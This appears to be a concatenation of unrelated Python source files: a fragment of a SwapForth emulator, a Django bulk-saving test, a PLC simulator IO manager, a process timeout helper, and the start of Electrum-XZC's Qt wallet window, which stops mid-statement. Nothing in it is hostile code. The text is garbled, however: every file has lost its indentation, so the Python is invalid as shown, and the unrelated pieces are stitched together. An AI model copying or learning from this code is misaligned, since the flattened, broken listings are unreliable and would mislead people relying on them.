self.lit(1)
self.slash_string()
return r
def da():
self.two_dup()
was = self.pops()
if len(was) == 3 and was[0] == "'" and was[2] == "'":
self.two_drop()
self.lit(ord(was[1]))
self.lit(1)
return
self.dlit(0)
self.two_swap()
if consume1(ord('$')):
base = 16
elif consume1(ord('#')):
base = 10
elif consume1(ord('%')):
base = 2
else:
base = None
neg = consume1(ord('-'))
self.to_number(base)
double = consume1(ord('.'))
if self.d.pop() != 0:
self.lit(-13)
self.THROW()
self.DROP()
if double:
if neg:
self.q('DNEGATE')
self.lit(2)
else:
self.DROP()
if neg:
self.NEGATE()
self.lit(1)
def doubleAlso():
da()
self.DROP()
def doubleAlso_comma():
da()
if self.d.pop() == 2:
self.SWAP()
self.LITERAL()
self.LITERAL()
while True:
self.parse_name()
if self.d[-1] == 0:
break
self.SFIND()
i = self.d.pop() + 1
self.state()
self.fetch()
i += 3 * self.d.pop()
[ # nonimmediate number immediate
# ------------ ------ ---------
self.EXECUTE, doubleAlso, self.EXECUTE, # interpretation
self.compile_comma, doubleAlso_comma, self.EXECUTE # compilation
][i]()
self.two_drop()
def REFILL(self):
self.q('SOURCEID @')
if self.d.pop() == 0:
self.tib()
self.lit(256)
self.ACCEPT()
self.q('SOURCEC !')
self.q('TIB SOURCEA !')
self.q('0 >IN !')
self.lit(-1)
else:
self.lit(0)
def putcmd(self, cmd):
if cmd.endswith('\r'):
cmd = cmd[:-1]
self.tib()
tib = self.d.pop()
for i,c in enumerate(cmd):
self.ram[tib + i] = ord(c)
self.q('TIB SOURCEA !')
self.lit(len(cmd))
self.q('SOURCEC !')
self.q('0 >IN !')
import threading
try:
import queue
except ImportError:
import Queue as queue
class AsyncSwapForth(SwapForth):
def __init__(self, cmdq, ready, *options):
SwapForth.__init__(self, *options)
self.cmdq = cmdq
self.ready = ready
while True:
self.REFILL()
if not self.d.pop():
assert 0, "REFILL failed"
self.lit(self.xt(self.interpret))
self.CATCH()
e = self.d.pop()
if e:
codes = {
-1 : ": aborted",
-4 : ": stack underflow",
-9 : ": invalid memory address",
-13 : ": undefined word",
-14 : ": interpreting a compile-only word",
-28 : ": user interrupt"}
self.out('error: %d%s\n' % (e, codes.get(e, "")))
else:
self.out(' ok\r\n')
def ACCEPT(self):
(a, n) = self.popn(2)
self.ready.set()
(self.out, s) = self.cmdq.get()[:n]
ns = len(s)
self.ram[a:a + ns] = ba(s)
self.lit(ns)
class Tethered(swapforth.TetheredTarget):
def __init__(self, *options):
self.searchpath = ['.']
self.log = open("log", "w")
self.ser = None
self.verbose = False
self.interpreting = False
self.ready = threading.Event()
self.cmdq = queue.Queue()
self.t = threading.Thread(target = AsyncSwapForth, args = (self.cmdq, self.ready) + options)
self.t.setDaemon(True)
self.t.start()
self.ready.wait()
def issue(self, writer, cmd):
assert self.ready.is_set()
self.ready.clear()
self.cmdq.put((writer, cmd))
self.ready.wait()
def interactive_command(self, cmd):
self.issue(sys.stdout.write, cmd)
def command_response(self, cmd):
r = []
self.issue(lambda c: r.append(c), cmd)
return "".join(r)
if __name__ == '__main__':
cellsize = 4
endian = '<'
try:
options,args = getopt.getopt(sys.argv[1:], 'c:b')
optdict = dict(options)
if '-c' in optdict:
cellsize = int(optdict['-c'])
if '-b' in optdict:
endian = '>'
except getopt.GetoptError:
print("usage:")
print(" -c N cell size, one of 2,4 or 8")
print(" -b big-endian. Default is little-endian")
sys.exit(1)
dpans = {}
allw = set()
t = Tethered(cellsize, endian)
t.searchpath += ['../anstests', '../common']
# print set(t.sf.dict.keys()) - dpans['CORE']
try:
t.include('swapforth.fs')
[t.include(a) for a in args]
except swapforth.Bye:
pass
if 0:
words = set(t.command_response('words').split())
missing = dpans['CORE'] - words
print(len(missing), "MISSING CORE", " ".join(sorted(missing)))
print(words - allw)
t.shell()
|
tests.py
|
from itertools import cycle
from threading import Thread
import queue
from django.test import TestCase
from bulk_saving.models import BulkSavableModel
from testapp.models import (
Bulky,
Foreign
)
class BulkSavableModelTestCase(TestCase):
def test_bulk_create_and_update(self):
foreign1 = Foreign.objects.create(name='John')
foreign2 = Foreign.objects.create(name='Steve')
foreigns = cycle([foreign1, foreign2])
bulky_count = 1000
bulk_chunk_size = 100
with self.assertNumQueries(bulky_count / bulk_chunk_size):
with Bulky.bulk_saving(chunk_size=bulk_chunk_size):
for _ in range(bulky_count):
Bulky(field='a', foreign=next(foreigns)).save_later()
bulkies = list(Bulky.objects.all())
self.assertEqual(len(bulkies), bulky_count)
with self.assertNumQueries(bulky_count / bulk_chunk_size):
with Bulky.bulk_saving(chunk_size=bulk_chunk_size):
for bulky in bulkies:
bulky.field = 'b'
bulky.save_later(update_fields=['field'])
self.assertEqual(Bulky.objects.count(), bulky_count) # no new bulkies should be created
self.assertEqual(Bulky.objects.filter(field='b').count(), bulky_count) # all bulkies should be updated
def test_bulk_updating_foreign_key(self):
foreign1 = Foreign.objects.create(name='John')
foreign2 = Foreign.objects.create(name='Steve')
bulky_count = 10
with Bulky.bulk_saving():
for _ in range(bulky_count):
Bulky(field='a', foreign=foreign1).save_later()
bulkies = Bulky.objects.all()
with Bulky.bulk_saving():
for bulky in bulkies:
bulky.foreign = foreign2
bulky.save_later()
self.assertEqual(Bulky.objects.filter(foreign=foreign2).count(), bulky_count) # all bulkies should be updated
def test_updating_foreign_key_to_none(self):
foreign = Foreign.objects.create(name='John')
bulky = Bulky.objects.create(field='a', foreign=foreign)
with Bulky.bulk_saving():
bulky.foreign = None
bulky.save_later()
self.assertEqual(Bulky.objects.get(pk=bulky.pk).foreign, None)
def test_thread_local(self):
q = queue.Queue()
def test_thread():
instance = BulkSavableModel()
q.put(hasattr(instance.bulk_save, 'enabled'))
thread = Thread(target=test_thread)
thread.start()
self.assertTrue(q.get())
thread = Thread(target=test_thread)
thread.start()
self.assertTrue(q.get())
|
IoManager.py
|
###############################################################################
# Project: PLC Simulator
# Purpose: Class to encapsulate the IO manager functionality
# Author: Paul M. Breen
# Date: 2018-07-17
###############################################################################
import logging
import threading
import time
import math
import random
class IoManager(object):
DEFAULTS = {
'byteorder': 'big',
'wave': {
'types': ['sin','sine','cos','cosine','sawtooth','square'],
'resolution': 1e3
},
'range': { # N.B.: stop is calculated from word length
'types': ['counter','randrange'],
'start': 0,
'step': 1
},
'random': {
'types': ['randrange','lognormal','uniform'],
'resolution': 1e3,
'lognormal': {'mu': 0, 'sigma': 1},
'uniform': {'a': 0, 'b': 1}
}
}
def __init__(self, conf, memory_manager=None):
self.conf = conf
self.memory_manager = memory_manager
def init_io(self):
for conf in self.conf['simulations']:
id = self.define_id(conf)
logging.info('Starting simulation {}'.format(id))
# N.B.: args expects a tuple, hence the trailing comma. Setting
# the thread's daemon status to True, ensures that the thread will
# terminate when the application main thread is terminated
simulation = threading.Thread(target=self.run_simulation, args=(conf,))
simulation.daemon = True
simulation.start()
def define_id(self, conf):
id = ''
try:
id = conf['id']
except KeyError:
pass
if not id:
# Generate an ID for this simulation from its configuration
mem_id = ':'.join([str(x) for x in conf['memspace'].values()])
func_id = ':'.join([str(x) for x in conf['function'].values()])
id = ':'.join([mem_id, func_id])
conf['id'] = id
return id
def define_range(self, conf):
range_params = []
wlen = self.memory_manager.get_section_word_len(conf['memspace']['section'])
start = self.DEFAULTS['range']['start']
stop = 2**(wlen * 8)
step = self.DEFAULTS['range']['step']
try:
range_params = conf['function']['range']
except KeyError:
pass
if len(range_params) == 0:
range_params = [start, stop, step]
elif len(range_params) == 1: # Only stop given
range_params.append(range_params[0])
range_params[0] = start
range_params.append(step)
elif len(range_params) == 2:
if range_params[1] < range_params[0]: # Decrementing range
range_params.append(-step)
else:
range_params.append(step)
conf['function']['range'] = range_params
return range_params
def define_parameter(self, name, conf, default):
param = default[name]
try:
param = conf[name]
except KeyError:
pass
return param
def run_simulation(self, conf):
sources = {
'counter': 0
}
self.init_simulation(conf, sources)
while True:
data = self.simulate_data(conf, sources)
if data is not None:
self.memory_manager.set_data(**conf['memspace'], data=data)
try:
time.sleep(conf['pause'])
except KeyError:
pass
def init_simulation(self, conf, sources):
# If constrained to a range, ensure the range is fully specified and
# that the sources are suitably initialised
if conf['function']['type'] in self.DEFAULTS['range']['types']:
self.define_range(conf)
sources['counter'] = conf['function']['range'][0]
if conf['function']['type'] in self.DEFAULTS['random']['types']:
try:
random.seed(a=conf['function']['seed'])
except KeyError:
pass
# Fallback to default parameters if not specified in configuration
if conf['function']['type'] == 'lognormal':
conf['function']['mu'] = self.define_parameter('mu', conf['function'], self.DEFAULTS['random']['lognormal'])
conf['function']['sigma'] = self.define_parameter('sigma', conf['function'], self.DEFAULTS['random']['lognormal'])
elif conf['function']['type'] == 'uniform':
conf['function']['a'] = self.define_parameter('a', conf['function'], self.DEFAULTS['random']['uniform'])
conf['function']['b'] = self.define_parameter('b', conf['function'], self.DEFAULTS['random']['uniform'])
def simulate_data(self, conf, sources):
data = bytearray(0)
wlen = self.memory_manager.get_section_word_len(conf['memspace']['section'])
nwords = int(conf['memspace']['nwords'])
if conf['function']['type'] == 'counter':
value = sources['counter']
sources['counter'] = self.get_next_range_value(conf['function']['range'], value)
data = self.value_to_bytes(value, nwords, wlen)
elif conf['function']['type'] == 'binary':
value = sources['counter']
sources['counter'] = (value + 1) % 2
data = self.value_to_bytes(value, nwords, wlen)
elif conf['function']['type'] == 'static':
value = int(conf['function']['value'])
data = self.value_to_bytes(value, nwords, wlen)
elif conf['function']['type'] in self.DEFAULTS['wave']['types']:
res = int(self.DEFAULTS['wave']['resolution'])
value = sources['counter']
sources['counter'] = (value + 1) % (2 * res + 1)
if conf['function']['type'] in ['sin','sine']:
y = int(math.sin((value / res) * math.pi) * res + res)
elif conf['function']['type'] in ['cos','cosine']:
y = int(math.cos((value / res) * math.pi) * res + res)
elif conf['function']['type'] == 'sawtooth':
y = value
elif conf['function']['type'] == 'square':
w = math.sin((value / res) * math.pi)
y = res if w < 0.0 else 2 * res
data = self.value_to_bytes(y, nwords, wlen)
elif conf['function']['type'] == 'randrange':
value = random.randrange(*conf['function']['range'])
data = self.value_to_bytes(value, nwords, wlen)
elif conf['function']['type'] in self.DEFAULTS['random']['types']:
res = int(self.DEFAULTS['random']['resolution'])
if conf['function']['type'] == 'lognormal':
w = random.lognormvariate(conf['function']['mu'], conf['function']['sigma'])
y = int(w * res) % 2**(wlen * 8) # Avoid OverflowError
elif conf['function']['type'] == 'uniform':
w = random.uniform(conf['function']['a'], conf['function']['b'])
y = int(w * res)
data = self.value_to_bytes(y, nwords, wlen)
elif conf['function']['type'] == 'copy':
data = self.memory_manager.get_data(**conf['source']['memspace'])
elif conf['function']['type'] == 'transform':
buf = self.memory_manager.get_data(**conf['source']['memspace'])
word = int.from_bytes(buf, byteorder=self.DEFAULTS['byteorder'])
value = self.transform_item(word, conf['function']['transform'])
if value is not None:
data = self.value_to_bytes(value, nwords, wlen)
else:
data = None
return data
def value_to_bytes(self, value, nwords, wlen):
data = bytearray(0)
b = value.to_bytes(wlen, byteorder=self.DEFAULTS['byteorder'])
for i in range(nwords):
data += b
return data
def get_next_range_value(self, range_params, value):
next_value = value + range_params[2]
if range_params[2] < 0:
if next_value <= range_params[1]:
next_value = range_params[0]
else:
if next_value >= range_params[1]:
next_value = range_params[0]
return next_value
def transform_item(self, state, transform):
item = None
t_in = transform['in']
t_out = transform['out']
# If the transform output is configured as 'null', then it takes the
# value of the state variable
if t_out is None:
t_out = state
if isinstance(t_in, (list, tuple)):
if t_in[0] <= state <= t_in[1]:
item = t_out
elif state == t_in:
item = t_out
return item
|
timeout.py
|
from multiprocessing import Process, Pipe
class Timeout:
def __init__(self, func, timeout):
self.func = func
self.timeout = timeout
def __call__(self, *args, **kargs):
def pmain(pipe, func, args, kargs):
result = None
try:
result = func(*args, **kargs)
except Exception:
pass
pipe.send(result)
parent_pipe, child_pipe = Pipe()
p = Process(target=pmain, args=(child_pipe, self.func, args, kargs))
p.start()
p.join(self.timeout)
result = None
if p.is_alive():
p.terminate()
result = None
raise TimeoutError
result = parent_pipe.recv()
return result
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys, time, threading
import os, json, traceback
import shutil
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
from PyQt5.QtGui import *
from PyQt5.QtCore import *
import PyQt5.QtCore as QtCore
from .exception_window import Exception_Hook
from PyQt5.QtWidgets import *
from electrum_xzc.util import bh2u, bfh
from electrum_xzc import keystore, simple_config
from electrum_xzc.bitcoin import COIN, is_address, TYPE_ADDRESS, NetworkConstants
from electrum_xzc.plugins import run_hook
from electrum_xzc.i18n import _
from electrum_xzc.util import (format_time, format_satoshis, PrintError,
format_satoshis_plain, NotEnoughFunds,
UserCancelled, NoDynamicFeeEstimates)
from electrum_xzc import Transaction
from electrum_xzc import util, bitcoin, commands, coinchooser
from electrum_xzc import paymentrequest
from electrum_xzc.wallet import Multisig_Wallet
try:
from electrum_xzc.plot import plot_history
except:
plot_history = None
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import *
from electrum_xzc.util import profiler
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
from electrum_xzc.paymentrequest import PR_PAID
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
notify_transactions_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config
self.setup_exception_hook()
self.network = gui_object.daemon.network
self.fx = gui_object.daemon.fx
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.is_max = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tx_notifications = []
self.tl_windows = []
self.tx_external_keypairs = {}
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', 8)
self.fee_unit = config.get('fee_unit', 0)
self.num_zeros = int(config.get('num_zeros',0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.addTab(self.create_history_tab(), QIcon(":icons/tab_history.png"), _('History'))
tabs.addTab(self.send_tab, QIcon(":icons/tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, QIcon(":icons/tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, QIcon(":icons/tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, QIcon(":icons/tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, QIcon(":icons/tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, QIcon(":icons/tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(QIcon(":icons/electrum-xzc.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.notify_transactions_signal.connect(self.notify_transactions)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['updated', 'new_transaction', 'status',
'banner', 'verified', 'fee']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
self.connect_slots(gui_object.timer)
self.fetch_alias()
def on_history(self, b):
self.new_fx_history_signal.emit()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide") if show else _("Show")) + " " + tab.tab_description
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
return self.top_level_window_recurse(override)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self),
self.wallet.basename() if self.wallet else "None")
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def on_network(self, event, *args):
if event == 'updated':
self.need_update.set()
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
elif event == 'new_transaction':
self.tx_notifications.append(args[0])
self.notify_transactions_signal.emit()
elif event in ['status', 'banner', 'verified', 'fee']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
self.history_list.update_item(*args)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.wallet = wallet
self.update_recently_visited(wallet.storage.path)
# address used to create a dummy transaction and estimate transaction fee
self.history_list.update()
self.address_list.update()
self.utxo_list.update()
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
self.notify_transactions()
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.print_error("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum-XZC Testnet" if NetworkConstants.TESTNET else "Electrum-XZC"
title = '%s %s - %s' % (name, self.wallet.electrum_version,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
self.warn_if_watching_only()
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.can_change_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend zcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request zcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def open_wallet(self):
wallet_folder = self.get_wallet_folder()
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
wallet_folder = self.get_wallet_folder()
i = 1
while True:
filename = "wallet_%d" % i
if filename in os.listdir(wallet_folder):
i += 1
else:
break
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
hist_menu = wallet_menu.addMenu(_("&History"))
hist_menu.addAction("Plot", self.plot_history_dialog).setEnabled(plot_history is not None)
hist_menu.addAction("Export", self.export_history_dialog)
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in OSX using this as work around
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Official website"), lambda: webbrowser.open("http://electrum-xzc.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters()[0]
self.pay_to_URI('zcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum-XZC",
_("Version")+" %s" % (self.wallet.electrum_version) + "\n\n" +
